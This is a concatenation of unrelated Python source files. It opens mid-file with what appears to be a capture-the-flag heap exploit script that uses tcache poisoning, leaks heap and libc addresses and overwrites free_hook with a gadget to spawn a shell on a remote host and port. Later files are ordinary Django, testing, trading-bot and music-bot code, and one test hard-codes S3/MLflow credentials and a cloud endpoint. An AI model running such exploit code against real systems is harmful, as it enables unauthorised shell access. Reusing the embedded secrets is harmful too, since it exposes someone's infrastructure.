    mode(brief)
    proc.recvuntil(':')
    proc.sendline('1')
    proc.recvuntil(':')
    proc.sendline('3')
    proc.recvuntil(':')
    proc.send(buf)
def edit(idx, buf, brief=True):
    """Drive the remote menu (option '2', presumably edit) to overwrite
    the contents of note *idx* with *buf*."""
    mode(brief)
    proc.recvuntil(':')
    proc.sendline('2')
    proc.recvuntil(':')
    proc.sendline(str(idx))
    proc.recvuntil(':')
    proc.send(buf)
def delete(idx, brief=True):
    """Drive the remote menu (option '3', presumably delete/free) on note *idx*."""
    mode(brief)
    proc.recvuntil(':')
    proc.sendline('3')
    proc.recvuntil(':')
    proc.sendline(str(idx))
def show():
    """Send menu option '3' without first selecting a mode — used by
    exploit() to print note contents for the leaks (confirm menu mapping)."""
    proc.recvuntil(':')
    proc.sendline('3')
def write(addr, value):
    # Arbitrary 8-byte write primitive.
    # NOTE(review): relies on the heap layout built in exploit(), where
    # editing note 3 redirects the pointer that note 0 writes through —
    # confirm against the groomed layout.
    edit(3, p64(addr))
    edit(0, p64(value))
def exploit():
    """Run the heap exploitation sequence against the target process.

    Grooms the heap via create/edit/delete, leaks a heap address and then
    a libc address from freed-chunk metadata, and finally overwrites
    free_hook with a gadget address (presumably a one-gadget) so the next
    free() spawns a shell. Returns False when the leaked heap base is
    unusable so the caller can retry with a fresh process.
    """
    if len(sys.argv) <= 1:
        # Local run: pause so a debugger can attach to the child PID.
        input('attach to pid: {}'.format(proc.proc.pid))
    create(p64(0xdeadbeef)) # 0 2d0
    for i in range(7): # fill tcache
        delete(0)
    show()
    proc.recvuntil(':')
    # Leak a heap pointer from the freed chunk; round down to the page base.
    heapbase = u64(proc.recvuntil(':')[:6] + b'\x00\x00')
    heapbase &= ~0xfff
    print(hex(heapbase))
    if (heapbase >> 40) == 0x55:
        # This address layout does not work for the technique — retry.
        return False
    create(b'\x00') # 1 320
    delete(0)
    edit(0, p64(heapbase + 0x285 - 0x8 + 8))
    create(b'\x00', False) # 0_ 2d0
    create(b'\x00', False) # 1_ 285-8
    edit(1, p64(0x51), False)
    #edit(1, p64((((heapbase + 0x280) << 24) & 0xffffffffffffffff) + 0x51), False)
    delete(0)
    edit(0, p64(heapbase + 0x285 + 8))
    create(b'\x00', False) # 2_
    create(b'\x00', False) # 3_ 285
    delete(1)
    edit(1, p64(heapbase + 0x285 - 0x8 + 8))
    create(b'\x00', False) # 0_ 2d0
    create(b'\x00', False) # 4_ 285-8
    edit(4, p64(((heapbase + 0x280) << 24) & 0xffffffffffffffff), False)
    edit(3, p64(0x56), False)
    # Zero out bookkeeping around the groomed chunks via the write primitive.
    write(heapbase + 0x2a0, 0)
    write(heapbase + 0x270, 0x100)
    write(heapbase + 0x2b0, 0) #0_
    write(heapbase + 0x2b8, 0) #1_
    write(heapbase + 0x2c0, 0)
    write(heapbase + 0x2c8, 0)
    write(heapbase + 0x2d0, 0)
    create(b'\x00', False)
    create(b'\x00', False)
    for i in range(8):
        delete(0, False)
    write(heapbase + 0x2b8, 0) #1_
    show()
    proc.recvuntil(':')
    proc.recvuntil(':')
    # Leak a libc pointer and subtract its static offset to get the base.
    libc_base = u64(proc.recvuntil('=')[:6] + b'\x00\x00')
    libc_base -= 0x3ebca0
    print(hex(libc_base))
    #malloc_hook = libc_base + 0x3ebc30
    free_hook = libc_base + 0x3ed8e8
    magic = libc_base + 0x4f322
    #write(malloc_hook, magic)
    write(free_hook, magic)
    delete(0, False) # Get shell!!!
    return True
if __name__ == '__main__':
    context.arch = 'amd64'
    # Remote target; any CLI argument switches from a local process to it.
    connect = 'nc 210.65.89.169 8888'
    connect = connect.split(' ')
    # exploit() returns False on an unusable address layout — retry with a
    # fresh process/connection until it succeeds.
    while True:
        if len(sys.argv) > 1:
            proc = remote(connect[1], int(connect[2]))
        else:
            proc = process(['./FaDaChai'], env={'LD_LIBRARY_PATH': './'})
            #proc = process(['./FaDaChai'])
        if exploit():
            proc.interactive()
            break
|
from setuptools import setup
# Packaging metadata for the studiouhr fullscreen studio clock.
setup(name='studiouhr',
      version='0.2',
      description='A pyglet based fullscreen studio clock',
      url='https://github.com/atoav/studiouhr',
      author='David Huss',
      author_email='dh@atoav.com',
      license='MIT',
      packages=['studiouhr'],
      install_requires=['pyglet'],
      # Ship the bundled fonts with the package.
      package_data = {'':['fonts/*.ttf']},
      # Installs the `studiouhr` command pointing at studiouhr.studiouhr:main.
      entry_points={'console_scripts':['studiouhr=studiouhr.studiouhr:main']},
      zip_safe=False
      )
|
# -*- coding: utf-8 -*-
from django.db import models
from datetime import datetime
from django.utils import timezone
# Create your models here.
class Course(models.Model):
    """Course catalog entry: description, difficulty, stats and cover image."""
    # Difficulty levels: (stored code, human-readable label).
    DEGREE_CHOICES = (
        ('cj','初级'),
        ('zj','中级'),
        ('gj','高级')
    )
    name = models.CharField(max_length=50,verbose_name='课程名')
    desc = models.CharField(max_length=300,verbose_name='课程描述')
    # TextField has no length limit (unlike CharField).
    detail = models.TextField(verbose_name='课程详情')
    degree = models.CharField(choices=DEGREE_CHOICES,max_length=2)
    # Duration in minutes.
    learn_times = models.IntegerField(default=0,verbose_name='学习时长(分钟数)')
    # Number of enrolled students.
    students = models.IntegerField(default=0,verbose_name='学习人数')
    fav_nums = models.IntegerField(default=0,verbose_name='收藏人数')
    image = models.ImageField(
        upload_to='courses/%Y/%m',
        verbose_name='封面图',
        max_length=100
    )
    click_nums = models.IntegerField(default=0,verbose_name='点击数')
    add_time = models.DateTimeField(default=timezone.now,verbose_name='添加时间')
    def __str__(self):
        return self.name
    class Meta:
        verbose_name = '课程'
        verbose_name_plural = verbose_name
class Lesson(models.Model):
    """A chapter belonging to a Course; deleted with its course."""
    course = models.ForeignKey(Course,on_delete=models.CASCADE,verbose_name='课程')
    name = models.CharField(max_length=100,verbose_name='章节名')
    add_time = models.DateTimeField(default=timezone.now,verbose_name='添加时间')
    class Meta:
        verbose_name = '章节'
        verbose_name_plural = verbose_name
class Video(models.Model):
    """A video belonging to a Lesson (chapter); deleted with its lesson."""
    lesson = models.ForeignKey(Lesson,on_delete=models.CASCADE,verbose_name='章节')
    name = models.CharField(max_length=100,verbose_name='视频名')
    add_time = models.DateTimeField(default=timezone.now,verbose_name='添加时间')
    # Consistency fix: `class Meta():` -> `class Meta:` to match the sibling
    # models in this file (behavior is identical).
    class Meta:
        verbose_name = '视频'
        verbose_name_plural = verbose_name
class CourseResource(models.Model):
    """A downloadable file attached to a Course."""
    course = models.ForeignKey(Course,on_delete=models.CASCADE,verbose_name='课程')
    name = models.CharField(max_length=100,verbose_name='名称')
    download = models.FileField(
        upload_to='course/resource/%Y/%m',
        verbose_name='资源文件',
        max_length=100
    )
    add_time = models.DateTimeField(default=timezone.now,verbose_name='添加时间')
    class Meta:
        verbose_name = '课程资源'
        verbose_name_plural = verbose_name
|
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from django.contrib.auth import get_user_model
from common.models import Injection, CRI, Prescription
from treatment_sheets.models import TxSheet, TxItem
from selenium import webdriver
import sys
# Resolve the active user model (supports a custom AUTH_USER_MODEL).
User = get_user_model()
# Selenium implicit wait, in seconds.
DEFAULT_WAIT = 10
class FunctionalTest(StaticLiveServerTestCase):
    """Base class for Selenium functional tests.

    Can run either against Django's local live test server or, when a
    ``liveserver=<host>`` argument appears on the command line, against a
    deployed staging host.
    """
    @classmethod
    def setUpClass(cls):
        # When a 'liveserver' CLI arg is present, target that host instead
        # of starting the local live server.
        for arg in sys.argv:
            if 'liveserver' in arg:
                cls.server_host = arg.split('=')[1]
                cls.server_url = 'http://' + cls.server_host
                cls.against_staging = True
                return
        super().setUpClass()
        cls.against_staging = False
        cls.server_url = cls.live_server_url
    @classmethod
    def tearDownClass(cls):
        # Only the locally-started live server needs class-level teardown.
        if not cls.against_staging:
            super().tearDownClass()
    def setUp(self):
        """Create the fixture user/medications and launch a Firefox session."""
        self.owner = User.objects.create_user('Marfalo', 'marfalo@gmail.com', 'terriblepw')
        Injection.objects.create(name='Tramadol', factor=1/50, concentration='5 mg/mL',
                                 category='Narcotic', admin='PO BID',
                                 desc='It can treat moderate to severe pain.')
        CRI.objects.create(name='Morphine', rates=[0.05, 0.005, 0.1, 0.001], factor=1/15, units="mg", calc_type='ez')
        CRI.objects.create(name='Dobutamine', factor=1/12500, calc_type='adv')
        self.scrip1 = Prescription.objects.create(name='Tylenol', desc='Miracle drug that cures everything.')
        self.scrip2 = Prescription.objects.create(name='Robitussin', desc='DMX')
        # Force blank start pages so Firefox doesn't hit the network on launch.
        profile = webdriver.FirefoxProfile()
        profile.set_preference("browser.startup.homepage", "about:blank")
        profile.set_preference("startup.homepage_welcome_url", "about:blank")
        profile.set_preference("startup.homepage_welcome_url.additional", "about:blank")
        self.browser = webdriver.Firefox(firefox_profile=profile)
        self.browser.implicitly_wait(DEFAULT_WAIT)
    def tearDown(self):
        self.browser.quit()
        super().tearDown()
    def get_item_input_box(self):
        """Return the weight input element on the current page."""
        return self.browser.find_element_by_id('id_weight')
    def create_list(self):
        """Create a treatment sheet with one item owned by the fixture user."""
        tx_sheet = TxSheet.objects.create(owner=self.owner, name='DD', comment='i heart diamond dogs')
        item1 = TxItem.objects.create(sheet=tx_sheet, med=self.scrip1)
        tx_sheet.txitem_set.add(item1)
|
import os
import sys
import unittest
import pytorch_lightning as pl
import pytorch_lightning.loggers
from deep_depth_transfer import ResultVisualizer
from deep_depth_transfer import UnsupervisedDepthModel, PoseNetResNet, DepthNetResNet, UnsupervisedCriterion
from deep_depth_transfer.data import KittiDataModuleFactory
from test.data_module_mock import DataModuleMock
from deep_depth_transfer.utils import LoggerCollection, TensorBoardLogger, MLFlowLogger
from pytorch_lightning.utilities import AttributeDict
# DataLoader worker processes: multiprocessing workers are problematic on
# Windows, so fall back to single-process loading there.
if sys.platform == "win32":
    WORKERS_COUNT = 0
else:
    WORKERS_COUNT = 4
class TestResultVisualizer(unittest.TestCase):
    """Smoke-train the unsupervised depth model with several logger setups.

    NOTE: these tests require a CUDA GPU (`.cuda()`, `gpus=1`), the KITTI
    dataset on disk and, for the MLflow test, a reachable tracking server.
    """
    def setUp(self) -> None:
        # Locate the KITTI dataset relative to this test file.
        current_folder = os.path.dirname(os.path.abspath(__file__))
        dataset_folder = os.path.join(os.path.dirname(current_folder), "datasets", "kitti")
        data_module_factory = KittiDataModuleFactory(range(0, 301, 1), directory=dataset_folder)
        self._data_module = data_module_factory.make_dataset_manager(
            final_image_size=(128, 384),
            transform_manager_parameters={"filters": True},
            batch_size=1,
            num_workers=WORKERS_COUNT,
            split=(0.8, 0.1, 0.1)
        )
        # Wrap the data module so tests run on a reduced mock dataset.
        self._data_module = DataModuleMock(self._data_module)
        pose_net = PoseNetResNet()
        depth_net = DepthNetResNet()
        criterion = UnsupervisedCriterion(self._data_module.get_cameras_calibration(), 1, 1)
        result_visualizer = ResultVisualizer(cameras_calibration=self._data_module.get_cameras_calibration())
        params = AttributeDict(lr=1e-3, beta1=0.99, beta2=0.9)
        self._model = UnsupervisedDepthModel(params, pose_net, depth_net, criterion,
                                             result_visualizer=result_visualizer).cuda()
        self._tb_logger = TensorBoardLogger('logs/')
        self._second_tb_logger = TensorBoardLogger('logs1/')
        self._double_tb_logger = LoggerCollection([self._tb_logger, self._second_tb_logger])
        # NOTE(review): S3/MLflow credentials are hard-coded in source —
        # move them to environment configuration outside the repository.
        os.environ["MLFLOW_S3_ENDPOINT_URL"] = "http://ec2-3-134-104-174.us-east-2.compute.amazonaws.com:9000"
        os.environ["AWS_ACCESS_KEY_ID"] = "depth"
        os.environ["AWS_SECRET_ACCESS_KEY"] = "depth123"
        self._mlflow_logger = MLFlowLogger(experiment_name="test",
                                           tracking_uri="http://ec2-3-134-104-174.us-east-2.compute.amazonaws.com:5001")
    def test_tb_logger(self):
        """One epoch with a single TensorBoard logger."""
        trainer = pl.Trainer(logger=self._tb_logger, max_epochs=1, gpus=1, progress_bar_refresh_rate=20)
        trainer.fit(self._model, self._data_module)
    def test_double_tb_logger(self):
        """One epoch logging to two TensorBoard loggers at once."""
        trainer = pl.Trainer(logger=self._double_tb_logger,
                             max_epochs=1, gpus=1, progress_bar_refresh_rate=20)
        trainer.fit(self._model, self._data_module)
    def test_mlflow_logger(self):
        """One epoch logging to the remote MLflow tracking server."""
        trainer = pl.Trainer(logger=self._mlflow_logger,
                             max_epochs=1, gpus=1, progress_bar_refresh_rate=20)
        trainer.fit(self._model, self._data_module)
from django.contrib import admin
# Register your models here.
from django.contrib import admin  # NOTE(review): duplicate import — harmless but redundant
from .models import Altbauwohnungen
# Expose the Altbauwohnungen model in the Django admin site.
admin.site.register(Altbauwohnungen)
|
import key
# Index (into symbolname) of the pair this bot instance trades.
symbolnumber = 1
# Trading pairs, with per-pair decimal precision for order quantity
# (symbollimit / simbollimitstring) and price (symbolpricelimit).
symbolname=["BNBUSDT" , "ADAUSDT" , "WAVESUSDT", "XRPUSDT", "NEOUSDT" , "EOSUSDT" , "DOTUSDT" , "LINKUSDT" , "DOGEUSDT","1INCHUSDT" , "BCHUSDT" , "XLMUSDT" , "ETCUSDT" , "SXPUSDT" , 'LTCUSDT']
symbollimit = [2 , 0 , 1 , 1 , 2 , 1 , 1 , 2 , 0 , 0 , 3 , 0 , 2 , 1 , 3]
simbollimitstring = ["%.2f" , "%.0f" , "%.1f" , "%.1f" , "%.2f" , "%.1f" , "%.1f" , "%.2f" , "%.0f" , "%.0f" , "%.3f" , "%.0f" , "%.2f" , "%.1f" , "%.3f"]
symbolpricelimit = ['%.2f',"%1.5f","%2.3f","%1.4f","%1.3f", "%.3f" , "%.3f" , "%.3f" , "%.6f" , "%.4f" , "%.2f", "%.5f","%.3f" , "%.4f" , "%.2f"]
# Field indices into the per-symbol indicator record (MACD/MA state).
ema52 = 0
ema24 = 1
signal18 = 2
macd =3
ramp = 4
lastramp = 5
price = 6
smallma = 7
smallmaindex = 8
bigma = 9
bigmaindex = 10
smallmadata = 11
bigmadata = 12
hostogramhistory = 13
pricedata = 14
priceindex = 15
rsi = 16
# Moving-average window lengths for the main interval.
smallmacount = 5
bigmacount = 20
# Field indices into the big-interval MACD record.
bigema52 = 0
bigema24 = 1
bigsignal18 =2
bighistogram = 3
biglasthistogram = 4
bigtwolasthistogram = 5
bigmacddata = 6
bigsignaldata = 7
bigmacdramp = 8
bigsignalramp = 9
# Field indices into the per-symbol trade-state record.
position = 0
sleep = 1
openprice = 2
highlimit = 3
lowlimit = 4
lasttraderesult = 5
intrade =6
closeprice = 7
fund = 8
quantity = 9
# Trade directions.
sell = 0
buy = 1
# Take-profit / stop-loss thresholds, as fractions of the open price.
highlimitpercent = 0.01
lowlimitpercent = 0.015
leverage = 1
# Candle intervals used for the three time frames.
interval = '5m'
intervalbig = "30m"
intervalsmall = '1m'
# API credentials come from the local key module (kept out of this file).
api_key = key.api_key
secret_key = key.secret_key
# Moving-average windows and RSI period for the small interval.
smallsmallmacount = 5
smallbigmacount = 23
rsinumber = 7
# Field indices into the small-interval MA record.
smallsmallmadata = 0
smallbigmadata = 1
smallbigmaindex = 2
smallsmallmaindex = 3
smallsmallma = 4
smallbigma = 5
smallsmallmaramp = 6
smallbigmaramp = 7
|
from rest_framework.settings import api_settings
from rest_framework.response import Response
from rest_framework.filters import BaseFilterBackend
from elasticsearch_dsl.query import MultiMatch, Q
from django.db.models import Case, When
from stretch.utils import import_class
import logging
# Module-level logger shared by the filter backend below.
logger = logging.getLogger('stretch')
class StretchSearchFilter(BaseFilterBackend):
    """DRF filter backend that narrows and orders a queryset via Elasticsearch.

    The search query is run against the view's configured index first; the
    queryset is then filtered to the matching primary keys and, unless the
    client asked for an explicit ordering, re-ordered by search relevance.
    """
    search_param = api_settings.SEARCH_PARAM
    def _cast_pk(self, pk):
        """Cast an Elasticsearch doc id back to an int pk when possible."""
        try:
            pk = int(pk)
        except ValueError:
            # Non-numeric primary keys (e.g. UUIDs) stay as strings.
            pass
        return pk
    def get_search_result_ids(self, search_results):
        """Extract model primary keys from the search hits, preserving order."""
        result_ids = []
        for result in search_results:
            pk = self._cast_pk(result.meta.id)
            result_ids.append(pk)
        return result_ids
    def set_ordering(self, request, queryset, result_ids):
        """
        Preserve the custom ordering from search, unless overwritten
        """
        ordering_param = api_settings.ORDERING_PARAM
        ordering = request.query_params.get(ordering_param)
        if not ordering:
            ## Preserve the search ordering
            ## NOTE: This adds a performance penalty of 100/200ms.
            preserved = Case(*[When(pk=pk, then=pos) for pos, pk in enumerate(result_ids)])
            queryset = queryset.order_by(preserved)
        return queryset
    def add_default_filters(self, s, view, index, request, queryset):
        """
        Set the top level filters for the search
        """
        # We MUST filter Elastisearch query by the default queryset items, or we will get incomplete
        # results due to pagination.
        pk_values = list(set(queryset.values_list('pk', flat=True)))
        s = s.filter(Q('ids', values=pk_values))
        return s
    def add_default_search(self, s, view, index, request, queryset):
        """
        Add a default search that uses multi-match against all the default index fields
        """
        query = request.query_params.get(self.search_param, '')
        # First component of default search filters on fuzzy matches of all fields.
        fuzzy_multi_kwargs = {
            'fields': index._meta.default_search_fields,
            'type': 'best_fields',
            'query': query,
            'fuzziness': 'AUTO',
            'analyzer': 'standard'
        }
        s = s.query('bool', filter=[Q('multi_match', **fuzzy_multi_kwargs)])
        # Second component of default search is a phrase based MultiMatch
        # We use `should` here so that we still show 0 score results from fuzzy match
        phrase_multi_kwargs = {
            'fields': index._meta.default_search_fields,
            'type': 'phrase',
            'query': query,
            'analyzer': 'standard'
        }
        s = s.query('bool', should=[Q('multi_match', **phrase_multi_kwargs)])
        return s
    def add_pagination(self, s, view, index, request, queryset):
        """Slice the search to the index's maximum result window."""
        # We must grab all results from elasticsearch, otherwise the pagination in
        # DRF will not work correctly. This may have performance implications and is worth
        # revisiting later. Currently our best bet is to grab the max result window of the index.
        # The default max result window is 10000, so more than that requires multiple requests
        pager_size = index._get_settings().get('max_result_window', 10000)
        s = s[0:pager_size]
        return s
    def add_extras_and_params(self, s, view, index, request, queryset):
        """Tune scoring and strip document bodies from the response."""
        # Guarantee complete scoring, rather than best guess scoring
        s = s.params(search_type='dfs_query_then_fetch')
        # Only grab meta since we are just interested in
        # primary keys. This speeds things up a bit.
        s = s.extra(_source=False)
        return s
    def build_search(self, view, index, request, queryset):
        """
        Prepare the Elasticsearch DSL Search instance
        """
        s = index.dsl.search() # Create a new Search instance
        s = self.add_default_filters(s, view, index, request, queryset)
        s = self.add_default_search(s, view, index, request, queryset)
        s = self.add_pagination(s, view, index, request, queryset)
        s = self.add_extras_and_params(s, view, index, request, queryset)
        # Additional hook for any last changes right from the view
        if hasattr(view, 'stretch_modify_search'):
            s = view.stretch_modify_search(s, view, index, request, queryset)
        return s
    def _get_index(self, view):
        """Resolve the view's `stretch_index` (dotted path or class) to an instance."""
        index = getattr(view, 'stretch_index')
        if isinstance(index, str):
            index = import_class(index)
        index = index()
        return index
    def _remove_default_ordering(self, view):
        """
        Prevent DRF Order Filter can override search ordering
        If the OrderingFilter is placed after the StretchSearchFilter
        and a default `ordering` is set, it will override the search ordering.
        This workaround will remove the default ordering from the view object
        when a request has a search being performed.
        """
        if hasattr(view, 'ordering'):
            setattr(view, 'ordering', None)
    def filter_queryset(self, request, queryset, view):
        """
        DRF Filter API Method
        """
        ## Pass through original queryset if the search filter isn't being used
        query = request.query_params.get(self.search_param, '')
        if not query:
            return queryset
        self._remove_default_ordering(view)
        index = self._get_index(view)
        s = self.build_search(view, index, request, queryset)
        search_results = s.execute()
        ## Filter and order queryset by search results
        result_ids = self.get_search_result_ids(search_results)
        queryset = queryset.filter(pk__in=result_ids)
        queryset = self.set_ordering(request, queryset, result_ids)
        return queryset
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from werkzeug.serving import run_simple
from werkzeug.debug import DebuggedApplication
from werkzeug.wsgi import SharedDataMiddleware
from word_finder.wsgi import application
from word_finder.settings import DEBUG, SERVE_STATIC
# Serve /static directly from the package when configured (dev convenience;
# in production a real web server should handle static files).
if SERVE_STATIC:
    application = SharedDataMiddleware(application, {'/static': os.path.join(
        os.path.dirname(__file__), 'word_finder', 'static')})
# In DEBUG mode wrap the WSGI app with Werkzeug's interactive debugger and
# run the auto-reloading development server.
if DEBUG:
    application = DebuggedApplication(application, evalex=True)
    run_simple('localhost', 8000, application, use_reloader=True)
|
import threading,time
import queue,random
# Bounded queue shared by the producer and consumer threads below.
q = queue.Queue(maxsize=10)
#
# def producer(name):
# count = 0
# remain = 0
# while True:
# if event.is_set():
# print("开始做饭")
#
# for i in range(10 - q.qsize()):
# q.put("骨头%s"%count)
# count = count + 1
# if i == int(10 - random.random()*10):
# break
# print("remain:%s"%q.qsize())
# event.clear()
# else:
# event.wait()
#
# def cusumer(name):
# num = 0
# while True:
# while q.qsize() > 0:
# num = num + 1
#
# print("%s 取到 %s 吃掉它,总共吃了%s"%(name,q.get(),num))
#
# event.clear()
# time.sleep(0.2)
# else:
# event.set()
#
#
# event = threading.Event()
#
#
# p = threading.Thread(target=producer,args=('Alex',))
#
# c = threading.Thread(target=cusumer,args=('a',))
# c1 = threading.Thread(target=cusumer,args=('b',))
# c2 = threading.Thread(target=cusumer,args=('c',))
#
# q.put("")
#
# p.start()
# c.start()
# c1.start()
# c2.start()
#
#
def product(name):
    """Producer loop: endlessly enqueue numbered items every 0.11 s."""
    n = 1
    while True:
        q.put("gutou%s" % n)
        # print("CountNum%s" % n)
        n += 1
        time.sleep(0.11)
def consume(name):
    """Consumer loop: print each item taken from the shared queue.

    Fix: the original busy-waited on ``q.qsize() > 0``, spinning the CPU at
    100% while the queue was empty and racing other consumers (qsize() > 0
    does not guarantee the subsequent get() won't block). A blocking
    q.get() has identical observable behavior without the spin.
    """
    while True:
        print("%s eat %s" % (name, q.get()))
# One producer and three consumers sharing the queue `q`.
t = threading.Thread(target=product,args=('alex',))
c2 = threading.Thread(target=consume,args=('a',))
c1 = threading.Thread(target=consume, args=('b',))
c3 = threading.Thread(target=consume, args=('c',))
t.start()
c1.start()
c2.start()
c3.start()
|
#!/usr/bin/python3
# coding=utf-8
import hashlib
import magic
import os
import sys
import variables as var
import constants
import zipfile
import requests
import mutagen
import re
import subprocess as sp
import logging
import youtube_dl
from importlib import reload
from PIL import Image
from io import BytesIO
from sys import platform
import traceback
import urllib.parse, urllib.request, urllib.error
import base64
import media
import media.radio
from packaging import version
log = logging.getLogger("bot")
def solve_filepath(path):
    """Resolve *path* relative to this module's directory.

    Empty input yields '', absolute paths pass through unchanged and any
    other path is prefixed with the directory containing this file.
    """
    if not path:
        return ''
    if path.startswith('/'):
        return path
    base_dir = os.path.dirname(os.path.realpath(__file__))
    return base_dir + '/' + path
def get_recursive_file_list_sorted(path):
    """Recursively list media files under *path*, sorted, relative to *path*.

    Honours the bot's 'ignored_folders' and 'ignored_files' config options,
    skips unreadable files and keeps only entries whose libmagic type looks
    like audio or video.
    """
    filelist = []
    for root, dirs, files in os.walk(path):
        relroot = root.replace(path, '', 1)
        if relroot != '' and relroot in var.config.get('bot', 'ignored_folders'):
            continue
        if len(relroot):
            relroot += '/'
        for file in files:
            if file in var.config.get('bot', 'ignored_files'):
                continue
            fullpath = os.path.join(path, relroot, file)
            if not os.access(fullpath, os.R_OK):
                continue
            # Keep the file when either the mime type or the textual magic
            # description indicates audio/video content.
            mime = magic.from_file(fullpath, mime=True)
            if 'audio' in mime or 'audio' in magic.from_file(fullpath).lower() or 'video' in mime:
                filelist.append(relroot + file)
    filelist.sort()
    return filelist
def get_music_path(music):
    """Return the playable URI for a music dict ('' for unknown types)."""
    kind = music["type"]
    if kind == "url":
        return music['path']
    if kind == "file":
        # Local files are stored relative to the configured music folder.
        return var.music_folder + music["path"]
    if kind == "radio":
        return music['url']
    return ''
def attach_item_id(item):
    """Attach a stable md5-based 'id' derived from the item's url/path."""
    # Which field identifies the item, per item type.
    key_by_type = {'url': 'url', 'file': 'path', 'radio': 'url'}
    source_key = key_by_type.get(item['type'])
    if source_key is not None:
        item['id'] = hashlib.md5(item[source_key].encode()).hexdigest()
    return item
def attach_music_tag_info(music):
    """Attach id/title/artist/thumbnail metadata to a music dict, in place.

    For local files, tags are read with mutagen (mp3 and mp4-family
    containers); a cover image — either a sibling .jpg or the embedded
    artwork — is shrunk to 100x100 and stored base64-encoded under
    'thumbnail'. A missing title falls back to the uri's basename.
    """
    music = attach_item_id(music)
    if "path" in music:
        uri = get_music_path(music)
        if os.path.isfile(uri):
            # Split "name.ext"; bail out for extension-less files.
            match = re.search("(.+)\.(.+)", uri)
            if match is None:
                return music
            file_no_ext = match[1]
            ext = match[2]
            try:
                im = None
                # Prefer a sibling cover image over embedded artwork.
                path_thumbnail = file_no_ext + ".jpg"
                if os.path.isfile(path_thumbnail):
                    im = Image.open(path_thumbnail)
                if ext == "mp3":
                    # title: TIT2
                    # artist: TPE1, TPE2
                    # album: TALB
                    # cover artwork: APIC:
                    tags = mutagen.File(uri)
                    if 'TIT2' in tags:
                        music['title'] = tags['TIT2'].text[0]
                    if 'TPE1' in tags: # artist
                        music['artist'] = tags['TPE1'].text[0]
                    if im is None:
                        if "APIC:" in tags:
                            im = Image.open(BytesIO(tags["APIC:"].data))
                elif ext == "m4a" or ext == "m4b" or ext == "mp4" or ext == "m4p":
                    # title: ©nam (\xa9nam)
                    # artist: ©ART
                    # album: ©alb
                    # cover artwork: covr
                    tags = mutagen.File(uri)
                    if '©nam' in tags:
                        music['title'] = tags['©nam'][0]
                    if '©ART' in tags: # artist
                        music['artist'] = tags['©ART'][0]
                    if im is None:
                        if "covr" in tags:
                            im = Image.open(BytesIO(tags["covr"][0]))
                if im:
                    # Normalize to a small RGB JPEG and embed as base64.
                    im.thumbnail((100, 100), Image.ANTIALIAS)
                    buffer = BytesIO()
                    im = im.convert('RGB')
                    im.save(buffer, format="JPEG")
                    music['thumbnail'] = base64.b64encode(buffer.getvalue()).decode('utf-8')
            except:
                # Best-effort: tag/artwork failures leave the dict untouched.
                pass
    else:
        uri = music['url']
    # if nothing found
    if 'title' not in music:
        match = re.search("([^\.]+)\.?.*", os.path.basename(uri))
        music['title'] = match[1]
    return music
def format_song_string(music):
    """Build the user-facing 'now playing' string for a playlist item."""
    kind = music["type"]
    title = music.get("title", "Unknown title")
    artist = music.get("artist", "Unknown artist")
    if kind == "radio":
        return constants.strings(
            "now_playing_radio",
            url=music["url"],
            title=media.radio.get_radio_title(music["url"]),
            name=music["name"],
            user=music["user"],
        )
    if kind == "url" and 'from_playlist' in music:
        return constants.strings(
            "now_playing_from_playlist",
            title=title,
            url=music['url'],
            playlist_url=music["playlist_url"],
            playlist=music["playlist_title"],
            user=music["user"],
        )
    if kind == "url":
        return constants.strings(
            "now_playing_url",
            title=title,
            url=music["url"],
            user=music["user"],
        )
    if kind == "file":
        return constants.strings(
            "now_playing_file",
            title=title,
            artist=artist,
            user=music["user"],
        )
    # Unknown source types yield an empty display string.
    return ''
def format_debug_song_string(music):
    """Build a compact log representation of a playlist item."""
    kind = music["type"]
    title = music.get("title", "??")
    artist = music.get("artist", "??")
    if kind == "radio":
        return "[radio] {name} ({url}) by {user}".format(
            name=music["name"], url=music["url"], user=music["user"])
    if kind == "url" and 'from_playlist' in music:
        return "[url] {title} ({url}) from playlist {playlist} by {user}".format(
            title=title, url=music["url"],
            playlist=music["playlist_title"], user=music["user"])
    if kind == "url":
        return "[url] {title} ({url}) by {user}".format(
            title=title, url=music["url"], user=music["user"])
    if kind == "file":
        return "[file] {artist} - {title} ({path}) by {user}".format(
            title=title, artist=artist, path=music["path"], user=music["user"])
    # Unknown source types yield an empty display string.
    return ''
def format_current_playing():
    """Return the 'now playing' string, with an inline thumbnail if any."""
    music = var.playlist.current_item()
    display = format_song_string(music)
    if 'thumbnail' not in music:
        return display
    # NOTE: the "image/jpge" mime string is reproduced from the original.
    thumbnail_html = ('<img width="80" src="data:image/jpge;base64,'
                      + music['thumbnail'] + '"/>')
    return display + "<br />" + thumbnail_html
# - zips all files of the given zippath (must be a directory)
# - returns the absolute path of the created zip file
# - zip file will be in the applications tmp folder (according to configuration)
# - format of the filename itself = prefix_hash.zip
# - prefix can be controlled by the caller
# - hash is a sha1 of the string representation of the directories' contents (which are
# zipped)
def zipdir(zippath, zipname_prefix=None):
    """Zip all readable, non-ignored files below the *zippath* directory.

    The archive is created in the bot's tmp folder, named
    '<prefix>_<sha1-of-filelist>.zip'; an existing archive with the same
    content hash is reused. Returns the archive's path.
    """
    zipname = var.tmp_folder
    # Sanitize the caller-supplied prefix (no path traversal, no slashes).
    if zipname_prefix and '../' not in zipname_prefix:
        zipname += zipname_prefix.strip().replace('/', '_') + '_'
    files = get_recursive_file_list_sorted(zippath)
    # Hashing the sorted listing makes the archive name content-addressed.
    hash = hashlib.sha1((str(files).encode())).hexdigest()
    zipname += hash + '.zip'
    if os.path.exists(zipname):
        return zipname
    zipf = zipfile.ZipFile(zipname, 'w', zipfile.ZIP_DEFLATED)
    for file in files:
        file_to_add = os.path.join(zippath, file)
        if not os.access(file_to_add, os.R_OK):
            continue
        if file in var.config.get('bot', 'ignored_files'):
            continue
        # Store entries relative to the parent so the archive keeps the
        # top-level directory name.
        add_file_as = os.path.relpath(os.path.join(zippath, file), os.path.join(zippath, '..'))
        zipf.write(file_to_add, add_file_as)
    zipf.close()
    return zipname
def get_user_ban():
    """Return an HTML-formatted list of banned user hashes."""
    lines = ["List of ban hash"]
    for entry in var.db.items("user_ban"):
        lines.append(entry[0])
    return "<br/>".join(lines)
def new_release_version():
    """Fetch the latest released version string from the update server."""
    v = urllib.request.urlopen(urllib.request.Request("https://packages.azlux.fr/botamusique/version")).read()
    return v.rstrip().decode()
def update(current_version):
    """Self-update the bot, or only youtube-dl, depending on versions.

    When the published version is newer than *current_version* (or the
